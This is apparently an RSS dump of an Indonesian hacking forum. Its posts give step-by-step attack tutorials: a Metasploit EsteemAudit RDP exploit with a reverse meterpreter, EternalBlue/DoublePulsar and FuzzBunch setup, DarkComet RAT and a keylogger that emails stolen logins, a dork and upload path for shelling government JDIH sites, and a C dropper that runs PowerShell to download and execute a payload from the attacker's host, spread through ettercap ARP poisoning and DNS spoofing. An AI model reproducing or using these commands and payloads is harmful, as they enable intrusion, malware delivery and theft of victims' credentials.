<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/3txm4Jvo2Oc" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
<br />
<br />
<br />
<span style="text-decoration: underline;" class="mycode_u">NOTES</span> :<br />
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.<br />
<br />
Oke sekian pos nya, semoga bermanfaat. Terimakasih.]]></description>
			<content:encoded><![CDATA[Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP.<br />
<br />
<img src="http://4.bp.blogspot.com/-xSJ8SJO1SUg/WTscSmpwYSI/AAAAAAAABI0/6lpOVAel128GiFgovr0iisD9oKU6yUVdACK4B/s1600/Untitled-1.png" alt="[Image: Untitled-1.png]" class="mycode_img" /><br />
<br />
Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit<br />
<br />
<br />
1. Download &amp; ekstrak file yang dibutuhkan<br />
Source : <a href="https://github.com/BlackMathIT/Esteemaudit-Metasploit" target="_blank" class="mycode_url">Esteemaudit-Metasploit</a><br />
<br />
Atau clone langsung seperti berikut<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git<br />
root@attackermachine:~/tool# cd Esteemaudit-Metasploit/<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit# ls -l</code></div></div><br />
<br />
<br />
2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit# cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit# cd files/<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# mkdir /usr/share/esteemaudit<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# cp * /usr/share/esteemaudit/</code></div></div><br />
<br />
<br />
3. Buka <span style="font-weight: bold;" class="mycode_b">msfconsole</span> dan mulai exploitasi dengan EsteemAudit<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>msf &gt; use exploit/windows/rdp/esteemaudit<br />
msf exploit(esteemaudit) &gt; set PAYLOAD windows/meterpreter/reverse_tcp<br />
msf exploit(esteemaudit) &gt; set LHOST IP_LISTENER_ATTACKER<br />
msf exploit(esteemaudit) &gt; set LPORT PORT_LISTERNER_ATTACKER<br />
msf exploit(esteemaudit) &gt; set TARGETARCHITECTURE x86</code></div></div><br />
<span style="font-style: italic;" class="mycode_i">Jika target/korban adalah 64bit maka</span> :<br />
<span style="font-weight: bold;" class="mycode_b">set PAYLOAD</span> <span style="font-weight: bold;" class="mycode_b">windows/x64/meterpreter/reverse_tcp</span><br />
<span style="font-weight: bold;" class="mycode_b">set TARGETARCHITECTURE x86 64-bit</span> <br />
<br />
Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>msf exploit(esteemaudit) &gt; show targets</code></div></div><br />
<div style="text-align: center;" class="mycode_align"><img src="https://image.prntscr.com/image/Lp-lKatrRRWov39DR-Ykww.png" width="550" height="330" alt="[Image: Lp-lKatrRRWov39DR-Ykww.png]" class="mycode_img" /></div>
<br />
Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>msf exploit(esteemaudit) &gt; set TARGET 4<br />
msf exploit(esteemaudit) &gt; exploit</code></div></div><br />
Jika sukses akan terbuka sesi meterpreter seperti berikut.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://image.prntscr.com/image/aIkCQ0tqRV2IE2LSpSZMog.png" width="550" height="350" alt="[Image: aIkCQ0tqRV2IE2LSpSZMog.png]" class="mycode_img" /></div>
<br />
<br />
<br />
<br />
Bonus Video :<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/3txm4Jvo2Oc" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
<br />
<br />
<br />
<span style="text-decoration: underline;" class="mycode_u">NOTES</span> :<br />
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.<br />
<br />
Oke sekian pos nya, semoga bermanfaat. Terimakasih.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hacking Windows 7 using EternalBlue & DoublePulsar via Metasploit on Backbox Linux]]></title>
			<link>https://www.backboxindonesia.or.id/thread-221.html</link>
			<pubDate>Fri, 05 May 2017 07:59:53 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-221.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">Tutorial cara Hack Windows 7 (all services pack) (x86) (x64) di 1 Jaringan Tanpa si Korban Mendownload dan Menjalankan Payload/RAT nya, menggunakan RCE/0 Days ini ya guyss...</div>
<div style="text-align: center;" class="mycode_align">Simak Aja Tutorialnyaa.. Kalau Ngerti ada Gajelas.</div>
<div style="text-align: center;" class="mycode_align">Bisa kontak saya Di Facebook/Thread ini okayyy :D</div>
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/c7b7tpEleCs" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">Tutorial cara Hack Windows 7 (all services pack) (x86) (x64) di 1 Jaringan Tanpa si Korban Mendownload dan Menjalankan Payload/RAT nya, menggunakan RCE/0 Days ini ya guyss...</div>
<div style="text-align: center;" class="mycode_align">Simak Aja Tutorialnyaa.. Kalau Ngerti ada Gajelas.</div>
<div style="text-align: center;" class="mycode_align">Bisa kontak saya Di Facebook/Thread ini okayyy :D</div>
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/c7b7tpEleCs" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hack Window 7 Menggunakan Shadowbroker (EternalBlue + DoublePulsar)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-217.html</link>
			<pubDate>Sun, 30 Apr 2017 07:32:01 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-217.html</guid>
			<description><![CDATA[thread pertama, &gt;.&lt; masih blajar , cuman mau sharing doang <br />
<br />
untuk setup shadowbrokernya bisa liat di thread ini <a href="http://www.backboxindonesia.or.id/thread-216-post-1027.html" target="_blank" class="mycode_url">http://www.backboxindonesia.or.id/thread...-1027.html</a><br />
<br />
untuk videonya dibawah<br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/LM9EaQ6Yl8w" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
sekian,,]]></description>
			<content:encoded><![CDATA[thread pertama, &gt;.&lt; masih blajar , cuman mau sharing doang <br />
<br />
untuk setup shadowbrokernya bisa liat di thread ini <a href="http://www.backboxindonesia.or.id/thread-216-post-1027.html" target="_blank" class="mycode_url">http://www.backboxindonesia.or.id/thread...-1027.html</a><br />
<br />
untuk videonya dibawah<br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/LM9EaQ6Yl8w" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
sekian,,]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cara install FuzzyBunch di Backbox Linux]]></title>
			<link>https://www.backboxindonesia.or.id/thread-216.html</link>
			<pubDate>Wed, 26 Apr 2017 17:06:48 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-216.html</guid>
			<description><![CDATA[Selamat malam semuanya..<br />
Kali ini saya akan sedikit menulis cara install FuzzyBunch yang katanya baru" ini telah di rilis oleh salah satu group hacker terkenal Equation Group..<br />
Dengan adanya berita ini saya mulai semangat lagi ngoding untuk merubah dunia menjadi lebih baik lagi, khususnya di dunia per hackingan atau apalah ga paham juga sih..<br />
Ma'lum saya masih awam juga sih sebenernya ;)<br />
Intinya di pembahasan kali ini saya akan mencoba mengangkat semangat para pecinta open source khususnya bagi pengguna Backbox Linux..<br />
Tanpa basa basi lagi kita coba praktekkan gimana cara installnya..<br />
<br />
Pertama :<br />
Kita install terlebih dahulu wine di dalam system dengan perintah<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# sudo apt-get install wine -y</code></div></div><br />
<br />
Kedua :<br />
Install python versi 2.6.6 menggunakan wine<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# wget https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi<br />
koboi@backbox:~# wine msiexec /i python-2.6.6.msi</code></div></div><br />
<br />
Ketiga :<br />
Install pywin32 menggunakan wine juga<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# wget https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download -O pywin32-221.win32-py2.6.exe<br />
koboi@backbox:~# wine pywin32-221.win32-py2.6.exe</code></div></div><br />
<br />
Keempat :<br />
Install FuzzyBunch di dalam system dengan mengetikan perintah ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# wget http://www.backboxindonesia.or.id/tmp/fuzzbunch_1-2_all.deb<br />
koboi@backbox:~# sudo dpkg -i fuzzbunch_1-2_all.deb</code></div></div><br />
Keterangan :<br />
wget = Untuk mendownload file Shadowbroker<br />
dpkg -i = Untuk menginstall paket deb yang telah kita download menggunakan wget<br />
<br />
Keempat :<br />
Kita bisa cari aplikasi di pencarian dengan mengetikan "FuzzBunch"<br />
<br />
atau bisa juga mengetikan di terminal<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# fuzzbunch</code></div></div><br />
<br />
Sampai step ini installasi sudah selesai. Kalo masih ada error atau kendala bisa di ketik di komentar berikut dengan penjelasan yang jelas ya ;)<br />
<br />
Note : Kalo penasaran file .deb nya ada backdoornya silahkan reverse engine atau bongkar sampe ke akar"nya.. :)<br />
<br />
Sejauh ini selama saya posting di forum yang trusted sumbernya insya allah bisa di pertanggung jawabkan.. :)<br />
<br />
Mungkin tutorial cara menggunakan FuzzyBunch nya akan di lanjut lagi nanti siang atau pagi.. Kalo pas bikin tutor ini sih jam 1 pagi tepatnya hehe<br />
Akhir kata dari sang newbie ini. :)<br />
Assalamualaikum wr. wb..]]></description>
			<content:encoded><![CDATA[Selamat malam semuanya..<br />
Kali ini saya akan sedikit menulis cara install FuzzyBunch yang katanya baru" ini telah di rilis oleh salah satu group hacker terkenal Equation Group..<br />
Dengan adanya berita ini saya mulai semangat lagi ngoding untuk merubah dunia menjadi lebih baik lagi, khususnya di dunia per hackingan atau apalah ga paham juga sih..<br />
Ma'lum saya masih awam juga sih sebenernya ;)<br />
Intinya di pembahasan kali ini saya akan mencoba mengangkat semangat para pecinta open source khususnya bagi pengguna Backbox Linux..<br />
Tanpa basa basi lagi kita coba praktekkan gimana cara installnya..<br />
<br />
Pertama :<br />
Kita install terlebih dahulu wine di dalam system dengan perintah<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# sudo apt-get install wine -y</code></div></div><br />
<br />
Kedua :<br />
Install python versi 2.6.6 menggunakan wine<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# wget https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi<br />
koboi@backbox:~# wine msiexec /i python-2.6.6.msi</code></div></div><br />
<br />
Ketiga :<br />
Install pywin32 menggunakan wine juga<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# wget https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download -O pywin32-221.win32-py2.6.exe<br />
koboi@backbox:~# wine pywin32-221.win32-py2.6.exe</code></div></div><br />
<br />
Keempat :<br />
Install FuzzyBunch di dalam system dengan mengetikan perintah ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# wget http://www.backboxindonesia.or.id/tmp/fuzzbunch_1-2_all.deb<br />
koboi@backbox:~# sudo dpkg -i fuzzbunch_1-2_all.deb</code></div></div><br />
Keterangan :<br />
wget = Untuk mendownload file Shadowbroker<br />
dpkg -i = Untuk menginstall paket deb yang telah kita download menggunakan wget<br />
<br />
Keempat :<br />
Kita bisa cari aplikasi di pencarian dengan mengetikan "FuzzBunch"<br />
<br />
atau bisa juga mengetikan di terminal<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>koboi@backbox:~# fuzzbunch</code></div></div><br />
<br />
Sampai step ini installasi sudah selesai. Kalo masih ada error atau kendala bisa di ketik di komentar berikut dengan penjelasan yang jelas ya ;)<br />
<br />
Note : Kalo penasaran file .deb nya ada backdoornya silahkan reverse engine atau bongkar sampe ke akar"nya.. :)<br />
<br />
Sejauh ini selama saya posting di forum yang trusted sumbernya insya allah bisa di pertanggung jawabkan.. :)<br />
<br />
Mungkin tutorial cara menggunakan FuzzyBunch nya akan di lanjut lagi nanti siang atau pagi.. Kalo pas bikin tutor ini sih jam 1 pagi tepatnya hehe<br />
Akhir kata dari sang newbie ini. :)<br />
Assalamualaikum wr. wb..]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How to setup DarkCometRAT + Ngrok on Backbox 2017 IP Public,Without Port Forwading]]></title>
			<link>https://www.backboxindonesia.or.id/thread-214.html</link>
			<pubDate>Thu, 06 Apr 2017 15:23:31 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-214.html</guid>
			<description><![CDATA[Apa itu Ngrok ?<br />
Ngrok adalah proxy server untuk membuat / membuka jaringan private melalui NAT atau firewall untuk menghubungkan localhost ke internet dengan tunnel yang aman.<br />
Ngrok adalah software yang digunkan untuk mempublikasikan localhost ke web.<br />
Jadi ini saya bermain RAT menggunakan DarkComet (Remote Administrations Tool) di Linux.<br />
Dijalan menggunakan wine disini. Tanpa PORT FORWARDING !<br />
<div style="text-align: center;" class="mycode_align">Simak saja Tutorialnya dibawah ini ya guys !</div>
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/wyFaabgHmbU" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></description>
			<content:encoded><![CDATA[Apa itu Ngrok ?<br />
Ngrok adalah proxy server untuk membuat / membuka jaringan private melalui NAT atau firewall untuk menghubungkan localhost ke internet dengan tunnel yang aman.<br />
Ngrok adalah software yang digunkan untuk mempublikasikan localhost ke web.<br />
Jadi ini saya bermain RAT menggunakan DarkComet (Remote Administrations Tool) di Linux.<br />
Dijalan menggunakan wine disini. Tanpa PORT FORWARDING !<br />
<div style="text-align: center;" class="mycode_align">Simak saja Tutorialnya dibawah ini ya guys !</div>
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/wyFaabgHmbU" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Create Your Own KeyLogger Using BeeLogger On Backbox 2017]]></title>
			<link>https://www.backboxindonesia.or.id/thread-207.html</link>
			<pubDate>Thu, 23 Mar 2017 04:17:55 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-207.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">Simak, Video Tutorial Nya ya Guyss :v, Jadi BeeLogger ini fungsi nya Seperti KeyLogger.<br />
<br />
Apa itu KeyLogger ? <span style="font-weight: bold;" class="mycode_b">KeyLogger</span> (juga disebut sebagai perangkat lunak mata-mata) adalah sebuah program kecil yang memonitor setiap keystroke pengguna mengetik pada keyboard komputer tertentu. <br />
<br />
Jadi, BeeLogger ini bisa menyimpan Akun Seperti Facebook, Instagram, Twitter,dll. Bahkan ketika kita mengetik apapun akan muncul result nya. Result nya di kirim melalui email guys. <br />
 Yaudah, tonton aja video nya :v. Jangan Lupa Like dan Subscribe  !!! :D<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/pIkceAKHY7A" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">Simak, Video Tutorial Nya ya Guyss :v, Jadi BeeLogger ini fungsi nya Seperti KeyLogger.<br />
<br />
Apa itu KeyLogger ? <span style="font-weight: bold;" class="mycode_b">KeyLogger</span> (juga disebut sebagai perangkat lunak mata-mata) adalah sebuah program kecil yang memonitor setiap keystroke pengguna mengetik pada keyboard komputer tertentu. <br />
<br />
Jadi, BeeLogger ini bisa menyimpan Akun Seperti Facebook, Instagram, Twitter,dll. Bahkan ketika kita mengetik apapun akan muncul result nya. Result nya di kirim melalui email guys. <br />
 Yaudah, tonton aja video nya :v. Jangan Lupa Like dan Subscribe  !!! :D<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/pIkceAKHY7A" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[JDIH Gov ID FCKEditor]]></title>
			<link>https://www.backboxindonesia.or.id/thread-184.html</link>
			<pubDate>Tue, 27 Dec 2016 17:08:34 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-184.html</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>++++++++++++++++++++++++++++++++++++++++++++++++<br />
 JDIH FCKEDITOR<br />
++++++++++++++++++++++++++++++++++++++++++++++++<br />
Dork:<br />
intitle:"Jaringan Dokumentasi Informasi Hukum"<br />
exploit:<br />
jdih.target(dot)go(dot)id/editor/filemanager/connectors/uploadtest.html<br />
location file:<br />
jdih.target.go.id/jdih/foto_upload/file.nganu<br />
+++++++++++++++++++++++++++++++++++++++++++++++++<br />
Fire fire fire !!!</blockquote>
<br />
untuk mengupload shell kalian cari reperensinya saja dari yang lain :)]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>++++++++++++++++++++++++++++++++++++++++++++++++<br />
 JDIH FCKEDITOR<br />
++++++++++++++++++++++++++++++++++++++++++++++++<br />
Dork:<br />
intitle:"Jaringan Dokumentasi Informasi Hukum"<br />
exploit:<br />
jdih.target(dot)go(dot)id/editor/filemanager/connectors/uploadtest.html<br />
location file:<br />
jdih.target.go.id/jdih/foto_upload/file.nganu<br />
+++++++++++++++++++++++++++++++++++++++++++++++++<br />
Fire fire fire !!!</blockquote>
<br />
untuk mengupload shell kalian cari reperensinya saja dari yang lain :)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[PowerShell Attack Vector - Alphanumeric Shellcode Injector kawin DNS Spoofing]]></title>
			<link>https://www.backboxindonesia.or.id/thread-178.html</link>
			<pubDate>Wed, 14 Dec 2016 18:55:01 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-178.html</guid>
			<description><![CDATA[<div style="text-align: left;" class="mycode_align">Warning!</div>
<div style="text-align: left;" class="mycode_align">Buat ente yang merasa pingin hek satelit ato ngehex CIA sorry bray, mending gausah diterusin bacanya, salah kamar bray. TS masi folos nubi tjoepoeh imut kyutt unyu tralala.</div>
<br />
<div style="text-align: left;" class="mycode_align">Bingung mo nulis apaan, jadi gini intinya aing pingin syeer salah satu anu yang masih anu melewati AV lawas yang gapernah update.</div>
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Keterangan :</span></span><br />
1. IP Attacker : 192.168.56.1<br />
2. IP Victim : gatau ane mah, bodoamat yang penting bisa obok obok.<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">MEMASAK PAYLOAD BUAT MAKAN MALEM</span> :*</span></div>
<br />
<div style="text-align: left;" class="mycode_align">1. Jadi user root dulu biar afdol </div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo su</code></div></div></div>
<div style="text-align: left;" class="mycode_align">2. Buka setoolkit</div>
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># setoolkit</code></div></div>Kalo udah kebuka langsung aja pilih nomer 1 (Social Engineering Attacks) &gt; Pilih nomer 9 (Powershell attack vector) &gt; Pilih nomer 1 (Powershell Alphanumeric Shellcode Injector)<br />
Kalo udah masukin IP &amp; Port ente yang berperan sebagai attacker, kalo udah pilih no aja, Ctrl+C aja sampe setoolkit nutup dan balik ke terminal.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/syk4SmAE.png" width="400" height="200" alt="[Image: syk4SmAE.png]" class="mycode_img" /></div>
<br />
<br />
<div style="text-align: left;" class="mycode_align">2. Secara otomatis setoolkit bakal generate sebuah payload dan bakalan disimpen di <span style="font-weight: bold;" class="mycode_b">/root/.set/reports/powershell/</span> Jadi kita pindah aja ke direktori tsb dan liat isinya.</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># cd /root/.set/reports/powershell/</code></div></div></div>
<br />
<div style="text-align: left;" class="mycode_align">Didalem nya akan ada sebuah file payload bernama <span style="font-weight: bold;" class="mycode_b">x86_powershell_injection.txt</span></div>
<div style="text-align: left;" class="mycode_align">Udah gitu kita pindah itu file ke web directory.</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># mv x86_powershell_injection.txt /var/www/html/pyld.txt</code></div></div></div>
Oke ayok ikutan pindah dir ke sana juga.<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># cd /var/www/html/</code></div></div><br />
3. Sekarang ane ngoding sebuah source program pake bahasa C<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># nano trap.c</code></div></div><br />
Nih source nya :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>#include &lt;stdio.h&gt;<br />
#include &lt;stdlib.h&gt;<br />
int main()<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;system("powershell.exe &#92;"IEX ((new-object net.webclient).downloadstring('http://192.168.56.1/pyld.txt'))&#92;"");<br />
&nbsp;&nbsp;&nbsp;&nbsp;return 0;<br />
}</code></div></div><br />
192.168.56.1 itu IP ente/attacker,   jadi fungsi program ini ntar saat dijalanin si korban bakalan ngunduh dan ngeksekusi file payload kita. Jadi komputer kita ntar juga bakal jadi webserver bentar.  <br />
<br />
<div style="text-align: left;" class="mycode_align">4. Compile source nya menjadi program (.exe)</div>
<br />
<div style="text-align: left;" class="mycode_align">Untuk melakukan cross-compilation pada linux kalian memerlukan MinGW</div>
<div style="text-align: left;" class="mycode_align"><a href="http://www.anwar.science/2016/12/cara-install-mingw-compiler-di-linux.html" target="_blank" class="mycode_url">Baca disini cara install nya</a></div>
<br />
<div style="text-align: left;" class="mycode_align">Cara ngompile nya gini</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># i686-w64-mingw32-gcc -o trap.exe trap.c</code></div></div></div>
<br />
<div style="text-align: left;" class="mycode_align">5. Compress file program nya jadi zip</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># zip trap.zip trap.exe</code></div></div></div>
<div style="text-align: left;" class="mycode_align">6. Buat file index.html yang bisa redirect ke file trap.zip</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># nano index.html</code></div></div></div>
<div style="text-align: left;" class="mycode_align">Code nya begini nih :</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/qoh3mmK6.png" width="400" height="200" alt="[Image: qoh3mmK6.png]" class="mycode_img" /></div>
<br />
<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">DNS SPOOFING</span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">Opsional sih ini cara nebar nya gimana, yang penting korban kudu buka file <span style="text-decoration: underline;" class="mycode_u">trap.exe</span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: x-small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i"><span style="color: #ff6666;" class="mycode_color">*Kalau ente berada di isolated-network (misal : <DVZ_ME#0>.id) gausah pake dns spoofing, dan upload file <span style="text-decoration: underline;" class="mycode_u">pyld.txt</span> ke hosting pribadi atau apa yang penting bisa diliat korban, jadi sesuaiin juga IP dalam source program <span style="text-decoration: underline;" class="mycode_u">trap.exe</span></span></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-size: x-small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #33cc66;" class="mycode_color">DNS Spoofing ini bakal berguna kalo ente ada di jaringan rumahan / warung wifi / pokoknya yang gak isolated-client (bisa arp poisoning / ping &amp; scan hosts lain)</span></span></span></div>
<br />
<br />
1. Edit konfigurasi ettercap<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># nano /etc/ettercap/etter.dns</code></div></div><br />
Cari kata microsof sucks, maka akan ketemu beberapa baris konfigurasi microsoft. Disable semua dengan menambahkan tanda pagar. Trus tambahin IP ente.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/4Wqbqlt1.png" width="400" height="200" alt="[Image: 4Wqbqlt1.png]" class="mycode_img" /></div>
Ntar korban yang terspoof ketika ingin mengakses web apa saja bakalan dialihkan ke IP ente. Dan saat membuka index.html justru akan dialihkan untuk mendownload file <span style="text-decoration: underline;" class="mycode_u">trap.exe</span><br />
<br />
2. Mulai DNS Spoofing<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># ettercap -G</code></div></div><br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Sniff</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Uniffied sniffing... </span>&gt; Pilih Network interface yang dipakai [eth0/eth1/wlan0/wlan1]<br />
<br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Hosts</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Scan for hosts</span><br />
<br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Hosts</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Hosts list</span> &gt; Masukkan IP Gateway ke <span style="font-weight: bold;" class="mycode_b">Target 1 </span>&gt; Masukkan IP korban ke <span style="font-weight: bold;" class="mycode_b">Target 2</span>. Gatau IP nya? Masukin aja semua IP selain gateway ke Target 2.<br />
Cara liat IP Gateway, buka terminal baru trus :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo route -n</code></div></div><br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Mitm</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Arp poisoning...</span> &gt; Centang pada <span style="font-weight: bold;" class="mycode_b">Sniff remote connections.</span><br />
<br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Plugins</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Manage the plugins </span>&gt; Klik 2x pada <span style="font-weight: bold;" class="mycode_b">dns_spoof </span>supaya aktif<br />
<br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Start</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Start sniffing</span><br />
<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">MENGAKTIFKAN WEB SERVER</span></span></div>
<br />
<br />
<div style="text-align: left;" class="mycode_align">Gini caranya, buka terminal baru dulu, trus :</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo service apache2 start</code></div></div></div>
<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">LISTENING [b][u]METERPRETER DI </span></span>METASPLOIT [/u][/b]</div>
